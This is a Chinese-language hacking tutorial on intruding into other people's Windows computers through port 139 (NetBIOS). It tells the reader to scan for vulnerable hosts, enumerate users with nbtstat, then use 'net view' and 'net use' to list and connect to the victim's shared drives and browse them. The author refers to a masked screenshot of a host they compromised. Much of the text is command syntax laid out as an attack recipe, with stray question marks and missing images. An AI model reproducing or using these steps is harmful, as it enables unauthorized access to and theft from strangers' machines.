139端口入侵

用139端口入侵

我们先确定一台存在139端口漏洞的主机。 用扫描工具扫描！比如SUPERSCAN这个端口扫描工具。 假设现在我们已经得到一台存在139端口漏洞的主机， 我们要使用nbtstat -a IP这个命令得到用户的情况！（如下图）现在我们要做的是与对方计算机进行共享资源的连接。

用到两个NET命令， 下面就是这两个命令的使用方法

NET VIEW?

作 用：显示域列表、计算机列表或指定计算机的共享资源列表。 ?

命令格式：net view [\\computername /domain[:domainname]]?

参数介绍：?

<1>键入不带参数的net view显示当前域的计算机列表。 ?

<2>\\computername 指定要查看其共享资源的计算机。 ?

<3>/domain[:domainname]指定要查看其可用计算机的域?

NET USE?

作用：连接计算机或断开计算机与共享资源的连接， 或显示计算机的连接信息。 ?

命令格式：net use [devicename *] [\\computername\sharename[\volume]]?

[password *]] [/user:[domainname\]username] [[/delete] ?

[/persistent:{yes no}]]?

参数介绍：?

键入不带参数的net use列出网络连接。 ?

devicename指定要连接到的资源名称或要断开的设备名称。 ?

\\computername\sharename服务器及共享资源的名称。 ?

password访问共享资源的密码。 ?

*提示键入密码。 /user指定进行连接的另外一个用户。 ?

domainname指定另一个域。 ?

username指定登录的用户名。 ?

/home将用户连接到其宿主目录?

/delete取消指定网络连接。 ?

/persistent控制永久网络连接的使用。 ?

C:\net use \\IP

C:\net view \\IP

我们已经看到对方共享了他的C， D， E三个盘 (如下图)

我们要做的是使用NBTSTAT命令载入NBT快取.

c:\>nbtstat –R 载入NBT快取

c:\>nbtstat –c 看有无载入NBT快取

上图中我用白色遮住的地方就是我已经得到的139端口漏洞的主机IP地址和用户名

现在我们已经得到的139端口漏洞的主机IP地址和用户名， 现在就该是我们进入他计算的时候了， 点击开始---查找--计算机， 将刚才找到的主机名字输入到上面， 选择查找， 就可以找到这台电脑了！双击就可以进入， 其使用的方法和网上领居的一样。

用139端口入侵

……